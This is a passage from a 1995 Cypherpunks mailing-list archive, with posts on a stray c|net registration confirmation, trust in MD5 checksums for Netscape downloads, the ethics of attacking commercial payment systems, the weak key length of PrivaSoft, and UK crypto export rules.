of cheese...  and certainly these folks turn out some cheezy web pages.

Also, I think any organization that thinks "WorldWide Wizdom (tm)"
is an appropriate name for a financial advice column needs to have a
marketing department transplant. And they should really lose that
ghastly black background. It makes the page look like a velvet
painting.

(heavy sigh)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 24 Oct 95 09:22:23 PDT
To: lharrison@mhv.net
Subject: Re: Verification of Registration
Message-ID: <9510241618.AA07331@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
>   Curious.  Did anyone else receive this unsolicited *invitation*?
> 
> At 11:31 PM 10/23/95 -0700, verify@cnet.com wrote:
> >Your membership registration has been processed.  To become a full member
> >of c|net online, please return the text of this message (to verify@cnet.com).

Someone signed the mailing list up.  I'm sure that they'll tell us about it
when they get done.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 24 Oct 95 09:28:18 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <308D04F8.7E0F@netscape.com>
Message-ID: <199510241622.JAA01499@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>   I posted a list of MD5 checksums as a personal favor to various cypherpunks
> who asked for them, since I have access to the original bits.  The official
> Netscape solution for checking your downloaded distribution will be
> announced later in the year.  In the mean time anyone who is uncomfortable
> with downloading the bits from the net can always buy a copy.  We will
> ship them the distribution on floppy.
> 

	That's quite lame.. (not on your part jeff, obviously, because
you posted the md5s) Netscape's responses in the past have been pretty
quick, but this is damn slow. I am disappointed. 

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 24 Oct 95 09:44:30 PDT
To: gorkab@sanchez.com (Brian Gorka)
Subject: Re: C|Net
In-Reply-To: <00998577B2607A40.00004156@sanchez.com>
Message-ID: <199510241637.JAA02576@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Eesh folks. Someone registered cypherpunks/cypherpunks as a
username/password combination at c|net and that was the
verification. relax.

> 
> Yes, I got it too.  What is it?
> 
> >  Curious.  Did anyone else receive this unsolicited *invitation*?
> >
> >At 11:31 PM 10/23/95 -0700, verify@cnet.com wrote:
> >Your membership registration has been processed.  To become a full member
> >of c|net online, please return the text of this message (to verify@cnet.com).
> >
> ----------------crap deleted---------------
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypherpunks@toad.com (Cypherpunks)
Date: Tue, 24 Oct 1995 09:03:00 -0700
To: verify@cnet.com
Subject: Re: Verification of Registration
Message-ID: <v02130502acb2bdaed21e@[204.131.233.49]>
MIME-Version: 1.0
Content-Type: text/plain


>Your membership registration has been processed.  To become a full member
>of c|net online, please return the text of this message (to verify@cnet.com).
>
>The following magic token in this message [cypherpunks::752400770] will be automatically
>processed to verify you.  Please note: The number included in the token is
>*not* your password; the one to use on the site is the one you entered on
>the registration form.
>
>Please include the complete token appearing above, including the brackets.
>The best way to return it to us is to include this entire message in your
>reply.  If your mailer does not allow you to do this, retype or cut and
>paste the magic token (including the square brackets) into a new message to
>verify@cnet.com. If you are having difficulty completing this process,
>please direct your questions to support@cnet.com.
>
>Once you are verified you will be able to take advantage of the full
>range of c|net online's services.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 24 Oct 95 10:14:29 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
In-Reply-To: <199510240659.QAA07645@sweeney.cs.monash.edu.au>
Message-ID: <199510241713.KAA06569@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Jiri Baum <jirib@sweeney.cs.monash.edu.au> writes:

>hfinney wrote (but didn't sign):
>> Well, this is not necessarily the case.  A MITM may be signing my
>> messages for me, and then putting them back the way they were before I
>> am allowed to see them.  Granted, this would not be easy, and perhaps
>...
>> futile.  Doesn't this bother you?

>The point is that what if there's a MIMT who is changing the signatures
>on the hfinney posts? What if originally they were signed "Alice" but
>then a MIMT went and substituted "Hal"?

>Then any reputation I attached to Hal should really go to Alice, no?
>And even when I get a certified key for Hal, I still can't really put
>the reputation onto it, since maybe the reputation really belongs to
>Alice.

>Doesn't this bother you?

Yes, this is a problem with the use of certificates to try to detect
the MITM.  As I wrote before, there is still a way in which certs can
be useful.  Your attack shows that you can't use true name certificates
to confirm that there is no MITM in front of Alice.  However, you can
use them to detect a MITM who is interposing himself between you and
the rest of the net.  In other words, if I am Alice, I can use
certificates to make sure that no MITM is behaving as above, altering
my messages and signing them "Hal".

What I do is to acquire a valid signature key via offline means, and use
that to validate the keys of people I want to communicate with.  I am
then able to send them messages securely, and ask them to confirm that my
keys and user name do match those which appear in messages I have posted.
The MITM is not able to know the contents of these messages which I send,
hence he can't stop me from finding out his existence.

>At least with digital signatures I can be certain that the same person
>always signed the messages (and that ri cannot repudiate them), even
>if I don't necessarily know who that person is. (I guess the issue
>becomes plagiarism rather than impersonation.)

IMO by itself knowing that the same person signed every one of a set of
messages is not that useful, since anyone can sign any message.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 24 Oct 95 07:17:43 PDT
To: cypherpunks@toad.com
Subject: Hacking commercial systems.
Message-ID: <9510241417.AA26593@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

	A number of people have been proposing hacks on commercial payment 
systems. Could I point out that this is not necessarily a good idea? One vendor 
I spoke to has a contract clause with sublicensees which requires a legal 
response in such situations. His opinion was that attempting such a crack on a 
"live" system constituted conspiracy to commit fraud and organisation of the
same could involve RICO penalties.

	It would seem prudent to approach such projects with a little caution. 
If a request were made for a sample of material to work on most companies would 
oblige and a refusal would provide protection against legal tactics. Most 
sensible companies would see the advantage of offering a reward.

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 24 Oct 95 07:33:21 PDT
To: cypherpunks@toad.com
Subject: Mondex flaws? Re: Mark Twain Bank (was: Anonymity: A Modest Proposal)
In-Reply-To: <v02120d07acb1f3d69b57@[199.2.22.120]>
Message-ID: <9510241433.AA21881@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

	You mention architectural problems in Mondex. Do you have any hard info 
on the specs? I'm trying to find someone who does who is willing/able to talk.

	One thing that struck me was that each Mondi would need to have both the 
secret and public parts of a public key incorporated (if that's what they are
doing) hence what is the advantage of public key? Yet they have an on chip 
modular exponentiation device on the new silicon rev...

	Looking at the secrecy stuff on Mondex, I suspect I would take the same 
approach, not to protect the core protection but so as to permit a gradual 
approach to penetration detection. I would expect some type of tripwire to be 
built into the device such that a fraud attempt apparently succeeds but 
indicates that there is a problem. 

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Tue, 24 Oct 95 10:35:46 PDT
To: cypherpunks@toad.com
Subject: What is needed for S/MIME remailer ?
Message-ID: <9509248145.AA814556043@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        The other day I was wondering what it would take to make an
anonymous remailer for an S/MIME client.  Implementing S/MIME from
scratch is a lot of work given the lack of a public domain
implementation, but it seems that a remailer could be built on top
of a commercial email product that supported S/MIME.  The question
is: What features should a commercial S/MIME email product have to
make it easy to support a remailer?  Are there a small set of
command line options that would greatly simplify a remailer
implementation?
                --Bob Baldwin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 24 Oct 95 07:46:20 PDT
To: dl@hplyot.obspm.fr (Laurent Demailly)
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
In-Reply-To: <9510241425.AA08815@hplyot.obspm.fr>
Message-ID: <9510241442.AA12411@all.net>
MIME-Version: 1.0
Content-Type: text


>  > [...] uses an MD5 checksum which the members
>  > of this list seem to place unlimited trust in (incorrectly in my view,
>  > but that would be picking two nits with one keyboard entry).
> 
> Can you elaborate with facts on the supposed weakness of MD5 ?

I didn't say that there were any weaknesses in MD5, all I said was:
	"unlimited trust ... (incorrectly in my view...)"

The lack of adequate demonstration of strength is not the same as a
weakness.  It represents only a lack of adequate assurance for placing
more than a certain amount of trust in MD5 for the purpose it is being
used to accomplish.

As to weaknesses, I seem to remember that someone managed to forge a
modification to a program used to observe networks on a Sun so that it
had the same MD5 checksum as the official trusted version.  But whether
this is real is not strictly the issue. 

In the case of the trust being placed in MD5 by Netscape, the assumption
being made (without adequate support as far as I can tell) is that an
MD5 checksum cannot be forced, through a chosen plaintext attack, to
yield checksums of 1, 2, 3, 5, 7, 9, ...  on up to enough primes to
allow the known plaintext attack that gets the RSA private key used to
authenticate messages.  As far as I am aware (and I may not be aware of
everything) there is no reference work to support this assumption.  If
the assumption is wrong, then the whole SSL can fall to a selected
plaintext attack launchable (presumably) through those general purpose
Java applets we have heard so much about.

> [btw who talked about 'unlimited' trust ?]

There has been no limit given by anyone on this list to the level of
trust they place in MD5.  Several people have posted (without
contention) that MD5 is sufficiently trustworthy to trust billions of
dollars in commerce to its being able to prevent a selected plaintext
attack as alluded to above.  If you think we should trust it, and you
don't limit your assessment of trust, what other assumption should I
make? If several people proclaim that trust and nobody stands up in
disagreement, tacit agreement is my normal (although not necessarily
justified) assumption. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Tue, 24 Oct 95 10:53:16 PDT
To: cypherpunks@toad.com
Subject: 80 bit security from 40 bit exportable products
Message-ID: <9509248145.AA814557096@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Long ago vendors should have put encryption into network layer
products, but for a variety of reasons that effort was delayed or
discouraged.  One effect of this lack is that almost every layer of
the network stack is adding its own encryption.  For example, the
HTTP session layer added S-HTTP and the TCP transport layer added
SSL.  Soon we will have network layer encryption with IPsec.
        The vendors for each layer can export a product that uses
ciphers with 40 bit keys.  A user can then combine multiple
products to get more than 40 bits worth of security.  For example,
a web client might fetch an S-HTTP page over an SSL protected link
via a firewall that supports IPsec tunnels.  That's three 40 bit
keys protecting the data over the internet link (of course, this
may not be equivalent to a 120 bit cipher, that depends on the
details of the cipher systems and independence of the key setups).
Interesting possibilities.
                --Bob Baldwin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Mon, 23 Oct 95 17:58:29 PDT
To: bigmac@digicash.com (Marcel van der Peijl)
Subject: Re: Re: Chaum's cash: backup?
In-Reply-To: <199510230611.HAA25001@digicash.com>
Message-ID: <199510240052.KAA06728@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Marcel van der Peijl <bigmac@digicash.com>
  and jamesd@echeque.com, cypherpunks@toad.com

MvdP wrote:
> "James A. Donald" <jamesd@echeque.com> wrote:
> >>if it was like "real" cash, then it really would be lost.
> >It is really lost.
...
> I could give a hint: your random state initializer is not the too-often 
> used srand( time( NULL ) ) but user-chosen during installation.

This sounds great... Will the bank be running crack against the proto-coins
it gets? (Say, at the behest of a LEA?)

Is there any way for the user to re-initialize the random state?

> Write that initializer down and you can re-generate all coins.
...

That's going to be one hell of a valuable piece of paper.
(Certainly to your enemies/prosecutors - it reveals the blinding factors
for every coin you ever spent.)


Please tell me I've got it all wrong...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIw44ixV6mvvBgf5AQEbEQP/dxnyqUNdtz46s19snQSr4lPTd7dtN7Bx
SJRl9IovlBx3qqMIkf/n/kp9pGPrfv9iUPzKVVQRjX9q1jsRYDxBwEwPAIZTXX1d
epwrYkGhO0R3PEz71u9O8FMz2vHHnGT8cjP7zSAnqIikqXfKdwRzy1wBtK5qUUPj
upYwGZUXK7M=
=tuu2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Raymond Val" <x85849i1@cadet1.USMA.EDU>
Date: Tue, 24 Oct 95 07:56:26 PDT
To: cypherpunks@toad.com
Subject: Re: Verification of Registration
Message-ID: <9510241456.AA25959@trotter.usma.edu>
MIME-Version: 1.0
Content-Type: text/plain


Lynne L. Harrison writes:

>  Curious.  Did anyone else receive this unsolicited *invitation*?

Everybody who receives mail from cypherpunks@toad.com received this
message because the message was addressed to
cypherpunks@toad.com.  Apparently someone may have 
joined this 'group' or service and used the cypherpunks address as 
the e-mail address.  Mayhap the cypherpunks@toad.com / cypherpunks
userid/password. 

This would be my guess, of course.

Does anybody know what this service does?

Raymond Val
x85849i1@cadet1.usma.edu

*********************************************************
My opinions are my own and are not the government's
or my school's.
*********************************************************

****************************************
Raymond Val
x85849i1@cadet1.usma.edu
****************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 24 Oct 95 08:08:38 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Verification of Registration
In-Reply-To: <9510241224.AA19261@mhv.net>
Message-ID: <199510241508.LAA25299@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


verify@cnet.com writes:
> Your membership registration has been processed. [...]
> The number included in the token is *not* your password;
> the one to use on the site is the one you entered on
> the registration form.

Lynne L. Harrison, Esq. writes:
>   Curious.  Did anyone else receive this unsolicited *invitation*?

...and several other people said "me too !!" to the 1000+ people on the list.

<sigh>

We really do have a lot of new people here these days, don't we ?  :}

OK, first of all, yes, we all got it, it was sent to the list address.

Second of all, sending messages that amount to "me too !", with lots of
gratuitous quoted text, to a large mailing list is generally a _very_
poor idea. This advice generally occurs in the first few pages of any general
guide to Usenet, netiquette, etc.  I wonder why they publish those things ?
No-one seems to read them....

Thirdly, what has happened is that someone has registered for a service at a
web site and given the c'punks list address as the membership address. 
Reply email is a standard mechanism for verifying an address.

Now, a while back some c'punks made a habit of signing up for various 
(usually free) services on the net, and publicizing the username/password
pairs, to stymie the collection of membership profiles etc. Often a
fairly standard combination like username=cypherpunk,password=cypherpunk was
used so people could easily guess the right pair for any given site.

Unfortunately, many people gave the list address as the member contact
address when they registered somewhere. Getting spammed with a potentially
huge number of registration confirmations isn't very helpful to the list.
Various people have asked everyone to cease signing the list up to these
sites. But the paradigm seems to have caught on a bit too well, and we still
get confirmation messages periodically.

Finally, have a nice day. 

Enough history -- now back to social studies with Alice.... 

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 24 Oct 95 10:54:36 PDT
To: cypherpunks@toad.com
Subject: Attacks on Products and Companies
Message-ID: <acb27260000210046c88@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:02 AM 10/24/95, Ian Goldberg wrote:

>We should be keeping in mind that the goal here is to end up, in one way
>or another, with a _secure_ way of transacting on the net.  To that end,
>it may be necessary to demonstrate that some current products don't
>provide that way.  We certainly don't want people to be scared away
>from using one insecure product, only to use another, especially
>if the latter is less secure than the former.
...
>Everything would be _so_ much easier to check, though, if these
>people would stop this "security through obscurity" garbage and
>publish their protocols, if not their source.
>
>   - Ian "Mr. Worf, activate targetting scanners."


I don't wish to beat a dead horse, but my main point is not that we (the
list members, and others) should not be scrutinizing and trying to break
systems, but that it should be done with less general nastiness.

What do I mean by "nastiness"? (And let me first hasten to add that neither
Ian Goldberg nor his partner were nasty in their attacks on Netscape.)

The problem I see is that people often _personalize_ the attacks, or treat
members of companies who show up on the list as _adversaries_. I can't know
for sure if the various folks from Netscape, First Virtual, Digicash,
Intuit, etc., who hang out on this list feel besieged, but I know I sure
would. If everything I said, even with disclaimers that I don't speak
officially, were to be torn apart and the ulterior motives speculated upon,
I'd either shut up on this list or get off it completely. (Recall that we
had Marc Andreessen on this list last December--for whatever reasons, and
there are likely several, he left. I recall many attacks on his company. He
perhaps figured "What the hell do I need this for?")

Legitimate, scientific analysis is commendable. The brute force attack on
Netscape was great, and even better was the random seed attack. But many of
the attacks are less solid:

"How can you people at Digital Datawhack produce such crap? The assumptions
you make in the Flogisticon module are disgusting, another example of
security through obscenity."

(What I think this piling on is likely to accomplish is to push company
list subscribers here to just shut up. They see that the more is said by
folks from Netscape, as the best current example, the more fireworks and
insults ensue. The less that is said the better. This is not a good
situation.)

I'm not arguing for "niceness," just that some of the edge be taken off the
attacks.

The "bounties" that are being offered in press releases have the danger of
inviting premature announcement of results. And of discouraging companies
from actively participating in this list and discussing what might be done
to improve security.

Just my views. No doubt some will think I'm a shill for some company.

--Tim May



Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Mon, 23 Oct 95 18:39:28 PDT
To: cypherpunks@toad.com
Subject: Re: [reformatted] how secure can privasoft be?
In-Reply-To: <199510210401.AAA16706@opine.cs.umass.edu>
Message-ID: <199510240132.LAA06800@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello privsoft@ix.netcom.com
  and cypherpunks@toad.com (Cypherpunks Mailing List)
  and futplex@pseudonym.com (Futplex)
 
F. writes:

...
> > The cryptographic engine of PrivaSoft
> > 
> > PrivaSoft uses a pseudo-random generator that is seeded by a 9 digit number 
> > uniformly normalized from the user's secret key.  The engine is proprietary, 
> > designed according to the rules of modern cryptology to make the best use of 
> > the allowable key length.
> 
> This seems paradoxical. PrivaSoft uses a key approximately 30 bits long. It
...
> Two possible explanations I can imagine are:
> 
> (0) PrivaSoft actually uses a key longer than 9 digits, and someone just made
...

Could it be 9 hex digits = 36 bits?

Perhaps there's an even bigger paradox in there:
  "
   The engine is proprietary, designed according to the rules of modern
   cryptology.
  "

Now I'm not familiar with the rules cited, but wouldn't proprietary
tend to go against them?

> [...]
> > The use of default keys

...
> meant to resist attacks based on the cryptanalyst gaining access to many 
> ciphertexts, even if all were encrypted with a single key.

Perhaps theirs isn't? Could be a Freudian slip, you know...

> [...]
> > A simple example:  For a short message, increasing the font 
> > size of the text by a factor of 10 will significantly increase the time 
> > required for breaking the encryption.
> 
> Anyone know how to get 120 point text in LaTeX ?

Don't worry, the whole thing sounds bogus anyway. I'd say a larger
font would make it *easier* to break (more correlation per pixel).
They probably think it'll be harder because there's more pixels.

In the original message (NOTE CHANGE IN INDENT!):

> From: anonymous@freezone.remailer

...

> Introduction
> 
> PrivaSoft is a communication security product, and the user is entitled to
> know how secure it is.  This document addresses the question of cryptographic 
> strength of PrivaSoft.

No it doesn't.

> Export license regulations
> 
> In some advanced countries, cryptographic products are categorized as 
> "munitions" and their use, sale or exportation is controlled by local 
> licensing regulations.  PrivaSoft has obtained an export license from the 
> governments of Israel and the USA.  Licenses in other countries are obtained 
...

All right, I guess it does. USA approved export, so it must be very weak.

...
> The basic intention of this regulation is to protect the state from abuse of 
> too strong cryptographic products by terrorists and criminals.
...

Is it? I think there are one or two people on this list who think the
intention is otherwise...

...
> The use of default keys
...
> This is done by using the pseudo-
> random "key extension" feature which is described in the PrivaSoft user's 
> guide.

Do they mean "salt"? If so why don't they say it?
If not, what *do* they mean?

> The information contents a clear message

This is a strange title (I suspect "of" dropped out), but it might
well sum it all up :-)

> If a cryptographic product is properly designed, then the almost only way to 

A big "if", if I might say so.

...
> a significant 
> portion of the page must be reconstructed, and a significant amount of 
> mathematical correlation must be calculated between neighboring areas of the 
> image, before the cracking software can tell whether the candidate key is 
...

This can at most buy you a constant factor - useful, but not very.
I doubt the two uses of "significant", too. Anybody remember those
diagrams in Typing textbooks about the layout of a letter?

...
> Customized versions of PrivaSoft
> 
...
> The cryptographic engine can be customer-furnished and customer integrated, 
...

What do they mean by this bit?


Sorry about being so negative, but it is necessary when evaluating security.

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 24 Oct 95 08:39:49 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Hacking commercial systems.
In-Reply-To: <9510241417.AA26593@zorch.w3.org>
Message-ID: <199510241539.LAA26204@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Phill writes:
> [One vendor's] opinion was that attempting such a crack on a "live" system 
> constituted conspiracy to commit fraud
[...]
> If a request were made for a sample of material to work on most companies 
> would oblige and a refusal would provide protection against legal tactics. 

Assuming for the sake of argument that the vendor's opinion turns out to be
legally valid (IANAL):

There's something here I don't understand. How would a refusal to provide
a sample for testing/hacking provide protection against possible fraud 
charges for hacking The Real Thing (tm) ?

Maybe that's how the law works (in some jurisdictions), but I don't see a
logical connection. I'm not aware of companies involved in deployed payment
systems throwing samples to the dogs.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 24 Oct 95 08:52:20 PDT
To: aleph1@dfw.net (Aleph One)
Subject: Does your software?
In-Reply-To: <Pine.SUN.3.90.951024083716.7258A-100000@dfw.net>
Message-ID: <9510241549.AA19649@all.net>
MIME-Version: 1.0
Content-Type: text


Aleph One / aleph1@dfw.net typed:
...
> fc@all.net typed:
> > That's correct.  Secure software has to have secure distribution in
> > order to maintain its security when distributed through an untrusted
> > channel.  I think that Netscape uses an MD5 checksum which the members
> > of this list seem to place unlimited trust in (incorrectly in my view,
> > but that would be picking two nits with one keyboard entry).
> 
> Question: Does your software (your stripped down http server, etc)
> do this? I bet not.

How much do you owe me?

The differences between my secure http server and Netscape's browser
are quite dramatic, so I think you deserve a fairly comprehensive answer.

My get-only server cannot run outside applications, and hence does not
have the vulnerability of Netscape's browser.  Note also the distinction
between a server and a browser.

My get-only server is available in source form, is 80 lines long and
thus easily understood, has been shown to meet security properties, is
now in the process of being mathematically proven to meet those
properties, and is published in a refereed journal which can be used to
confirm its contents in detail.  Hence, I do provide secure distribution
through purely physical means. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 24 Oct 95 08:54:39 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
In-Reply-To: <9510241425.AA08815@hplyot.obspm.fr>
Message-ID: <199510241554.LAA27916@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen writes:
# MD5 [...] which the members of this list seem to place unlimited trust in 
# (incorrectly in my view, 

Laurent Demailly writes:
> Can you elaborate with facts on the supposed weakness of MD5 ?

Remember the can-you-trust-PGP flamewar we had a few months ago ?

I believe Dr. Cohen's point is that no-one knows, AFAIK, how to prove that a
one-way hash is truly one-way (uninvertible). We cannot prove that MD5 is
secure, ergo we cannot (completely) trust it. [Please correct if this is a
substantially incorrect inference.]

One of the standard responses is "it's the best we can do". When people said
this about PGP, FBC made some (IMHO) interesting comments about the
encryption he uses in various circumstances. Perhaps he would like to share
his personal choices of one-way hash functions with us.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 24 Oct 95 08:58:21 PDT
To: cypherpunks@toad.com
Subject: Fred, Fred, Fred: Enough already!
Message-ID: <v02120d07acb2bab4104b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Can we please talk to Dr. Fred, the Poster Child of the Informal Fallacy,
if we *really* have to, off line?

I had my fill of specious arguments in college already. Speaking of both, I
would recommend any book on elementary logic (Copi used to be a good one),
specifically the informal fallacies section, if you want a good laugh, and
to see why his "Did so, did not! Prove it didn't!" argument style makes me
want to step outside and hork in the bushes.

I would hate to kill-file people who are normally clueful, but I will, just
to get this second-order Fredness out of my face.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbaber@mi.leeds.ac.uk
Date: Tue, 24 Oct 95 04:04:50 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: crypto export from the UK
Message-ID: <208.9510241158@misun2.mi.leeds.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Adam <aba@atlas.ex.ac.uk> writes:
> Jon Baber <jbaber@mi.leeds.ac.uk> writes: 
> > I believe that the laws regarding the export of crypto from the UK are
> > very similar to the ITAR regs in the US.
> 
> I thought they were markedly different!
> 
> I always understood there were NO restrictions on crypto export,
> import or use to western countries.  There used to be COCOM agreements
> which said that you should get approval to send commercially produced
> crypto to some blacklisted countries (Iraq, etc).  I also read that
> the COCOM restrictions did not claim to apply to free software.

I think that it was the COCOM restrictions that I was thinking about. The
blacklist was fairly large (including the USSR) and I believe that it did apply
to software (although I do not know about free software).

> Anyway, I read that the COCOM agreement has expired, so none of this
> applies anymore, even.

Now this I did not know. Do you know when it expired and why it was not renewed?
We must still have some export restrictions for Munitions; does this no longer
cover crypto?

> > However our Government seems to take the view that putting crypto
> > software on the net is not exporting it, the exporting is done
> > whenever anyone from an export restricted country downloads the
> > software and is done by them rather than by the person who made the
> > software available.

> I also have heard this.

I can not remember where I heard this though. I don't suppose you know whether
this was an official policy statement or just a comment like 'well it may
technically be illegal but we would hold the downloader liable rather than the
supplier'?

> I think he would be safe emailing it, putting it on the WWW, or
> posting it to USENET.  There are no selective access restrictions on
> *any* crypto ftp/http sites that I know of in the UK (like various
> ones in the US which make a show of enforcing the export restriction by
> not allowing export to non-US domain names.)
> 
> Adam

I do not know of any crypto sites in this country with access restrictions but
I would still probably make any software available via the WWW or an FTP site
(or maybe post it to USENET via a host in this country) rather than actively
mail it abroad... but then again I am paranoid (at least it does not involve
shipping large pipes out of the country).

Jon
jbaber@mi.leeds.ac.uk
http://www.chem.surrey:80/~ch02jb/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 24 Oct 95 05:11:24 PDT
To: jbaber@mi.leeds.ac.uk
Subject: Re: crypto export from the UK
In-Reply-To: <208.9510241158@misun2.mi.leeds.ac.uk>
Message-ID: <28071.9510241209@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



[Paul: cc'd you about legal question about who it is that "exports"
the person downloading or the person with the server, you made a
comment on this a short while ago in one of the crypto groups (below)]

Jon Baber <jbaber@mi.leeds.ac.uk> writes in cypherpunks:
> Adam <aba@atlas.ex.ac.uk> writes:
> > I thought they were markedly different!
> > 
> > I always understood there were NO restrictions on crypto export,
> > import or use to western countries.  There used to be COCOM agreements
> > which said that you should get approval to send commercially produced
> > crypto to some blacklisted countries (Iraq, etc).  I also read that
> > the COCOM restrictions did not claim to apply to free software.
> 
> I think that it was the COCOM restrictions that I was thinking
> about. The blacklist was fairly large (including the USSR) and I
> believe that it did apply to software (although I do not know about
> free software).

Hadn't seen the blacklist.  USSR now has its own blanket crypto ban,
a translation of the Russian text of the presidential decree was
posted by someone a while back.

> > Anyway, I read that the COCOM agreement has expired, so none of this
> > applies anymore, even.
> 
> Now this I did not know. Do you know when it expired and why it was
> not renewed?  We must still have some export restrictions for
> Munitions; does this no longer cover crypto?

Sorry, that one was I think got from reading USENET, or at least I no
longer recall where I read it, so I can't vouch for the accuracy of
that.  (I should have disclaimed that).  Perhaps someone else knows
enough to refute, or validate that.

But I was reading about the COCOM restrictions this morning on
Bert-Jaap Koops crypto law survey page:
